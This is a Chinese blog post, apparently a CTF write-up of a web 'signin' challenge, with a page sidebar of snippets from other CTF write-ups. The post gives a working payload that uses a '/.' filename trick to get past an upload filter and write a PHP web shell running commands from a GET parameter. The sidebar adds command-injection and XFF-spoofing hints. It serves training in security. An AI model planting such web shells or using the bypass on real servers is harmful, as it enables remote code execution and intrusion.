青少年CTF-web-signin

最新推荐文章于 2023-10-19 11:17:43 发布
最新推荐文章于 2023-10-19 11:17:43 发布
阅读量706 收藏 1
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63047884/article/details/128350873
版权

 开环境看到是一个php的源代码,先审计一下,大概可以知道filename是要编写的文件名,data是要写入文件的内容,但是发现基本上所有可以用的木马后缀名都被过滤了

 上网找了一下pathinfo函数的漏洞,发现可以用1.php/.绕过,就是写完木马文件名之后加一个/.就可以绕过了,我也不知道原理是啥,但是就是这么用的

最后的payload为filename=5.php/.&data=<?php system($_GET["cmd"]);?>

然后访问5.php直接执行命令就可以看到flag了,flag在源代码里,这个需要注意一下

 

 

Aclence
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
青少年CTF-Web-Easy PingMe攻略
小苏
11-30 950
分号字符,决定使用这个符号进行操作,经过这条命令可以得知本目录下还有一个文件名为【flag.php】,猜测flag就在该文件中,所以使用【1.1.1.1;这是因为他是php语言,且将flag赋值在了变量中,并没有将它进行输出!第二步:开始尝试注入,先测试是否会过滤一些字符之类的操作 这里以【1.1.1.1;见怪不怪了,尝试【CTRL+U】查看源代码看看是否有什么东西出现!end:遇到命令注入的可以尝试【;前言:根据题目意思得知该题目为命令执行【命令注入】第一步:启动靶场,然后打开链接查看原型。
[青少年 CTF] Web签到
piggcs的博客
04-03 616
扫出一个备份文件/index.php.bak,在地址输入/index.php.bak。输入指令python dirsearch.py -u http://xxxx。命令行输入 python,返回版本号则安装成功(环境配置成功)。此工具是Python3工具,所以先要部署Python3环境。建议默认安装到C盘 且 勾选PATH(自动配置环境变量)。进入Python官网后找到自己想要的版本和相应的系统。自动下载一个文件,用记事本打开,得到flag。安装完成后 win+r 输入 cmd。
N1CTF2020 Web SignIn-wp
Firebasky的博客
10-20 1031
报名了N1CTF 结果没有做 有点后悔 最后才看wp跟着做一次 还有谢谢atao师傅提供的脚本。 看来自己也要学习一下怎么写简单的脚本啦。 一 源代码 <?php class ip { public $ip; public function waf($info){//设置waf } public function __construct() { if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ .
青少年CTF平台 Web签到
zxsctf的博客
10-09 3993
Web一星简单题,Web签到。直接启动环境,等待30秒左右访问题目链接。
n1ctf2020-web-signin
veinard_F的博客
10-20 705
水平不够,复现困难,先做个简单的记录,,, 题目源码: class ip { public $ip; public function waf($info){ } public function __construct() { if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $this->ip = $this->waf($_SERVER['HTTP_X_FORWARDED_FOR'])
{青少年CTF} Web签到 详解
lfc18950509270的博客
07-26 1209
又是除了几个字外一片空白,可能有的同学照例打开源代码看了起来,但是什么也没发现。这时候,我们可能就需要看一下它的目录下有没有什么文件里藏着flag。可以发现,扫描出目录下存在一个加index.php.bak的文件,直接复制到浏览器中,下载得到它,直接打开即可发现flag。至于它的安装和使用方法你们可以自己搜一下,或者你们需要在找个时间单独写一篇。这边使用的命令是dirsearch -u ,u指的就是url的意思。这样我们又有了一种思路可以拿到flag了,虽然也比较简单。进入之后可以看到是长这样的。
ctf-all-in-one
最新发布
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-登陆一下好么?
Grey的博客
05-04 1364
、select * from user where username='用户名' and password='密码'  利用  1'='1  0'='0这样显然不行,因为查询到数据库中没有username=1 的元组,返回了0而  0 !='1'  所以需要改为  username= 1'='0password= 1'='0先看前面username那一块,由于两个等号是从左往右计算的,userna...
ctf Sign_in.apk 解题笔记
u010490930的博客
10-19 197
ctf解题笔记
青少年CTF-WEB-Queen
m0_63047884的博客
11-22 1205
先抓包这个页面,然后再头部信息里面添加X-Forwarded-For:127.0.0.1。再次发送发现有回显页面,data后面是一串base64加密的值,先解密看一下。解密之后发现是将用户名和密码加密了,想到有可能是sql注入。提交完显示不是管理员的ip,这里想到用xff绕过。然后直接爆它的sql数据库就可以看到flag了。右键将login.php页面复制到文件。用sqlmap -l 跑就可以了。用户名密码随便输入,点击提交。打开环境,是一个网页登录界面。
BUUCTF-----signin
qq_64558075的博客
12-09 571
1.拿到文件,查壳 收集信息,无壳,64位程序 2.拖入ida中 程序调用了 __gmpz_init_set_str 函数,这是一个 GNU 高精度算法库,在以前的RSA加密中见过很多次,加上65537这个比较敏感的数据,就基本确定了这是道RSA加密 可以从程序的本身得知 公钥N=103461035900816914121390101299049044413950405173712170434161686539878160984549 E=65537 加密后的密文为:ad939ff5.
ctfshow愚人杯-web-wp
qq_46570234的博客
04-03 1605
4月1日-4月2日愚人杯部分webWP,包括侥幸过的非预期解的“被遗忘的反序列化”
[攻防世界XCTF&青少年CTF]做题笔记upload1|warmup|Web_phpunserialize|CheckMe08|Queen|Web_python_template_injection
明裕学长的博客
03-18 548
举个例子,传入参数是flag.php,首先经过mb_strpos获取位数,为8.然后经过mb_substr截取flag.php的前八位,也就是flag.php。mb_substr() 函数返回字符串的一部分。substr() 函数,它只针对英文字符,如果要分割的中文文字则需要使用mb_substr()。函数过滤,就执行文件包含,否则就输出滑稽图片,而需要被包含的文件就是。返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。这段代码的大意是获取传入的参数位数,然后截取前该位数的字符。
[青少年CTF]弱口令实验室招新赛部分WriteUp
个人文章分享
11-29 1149
2022弱口令实验室招新赛部分wp
2021-6-8:参加CTF校赛的WP
Hammers_12的博客
06-08 1693
一、Sign_in 简单web题 正常思路先看一下源码 按F12 后看到答案 二、签到 简单Misc题 打开以后 看到有问题和文件夹可以选择 直接选到底 直接得到flag 三、简单题 Reverse简单题 直接打开附件 给出附件为getflag.c文件, 可以看出,flag即为FJZ{1jf11dm4hpns9k0wk2s}的解密 char *caesar_f(char * passwd) { int i,j...
2021黑盾杯CTF部分WP
qq_45149716的博客
12-05 5078
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
青少年ctf web unserialize
08-28
青少年 CTF(Capture The Flag)比赛是一个针对青少年的网络安全竞赛。在 CTF 中的 Web 题目中,可能会涉及到反序列化(unserialize)漏洞。 反序列化漏洞是一种常见的安全问题,它发生在将数据从序列化的状态...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值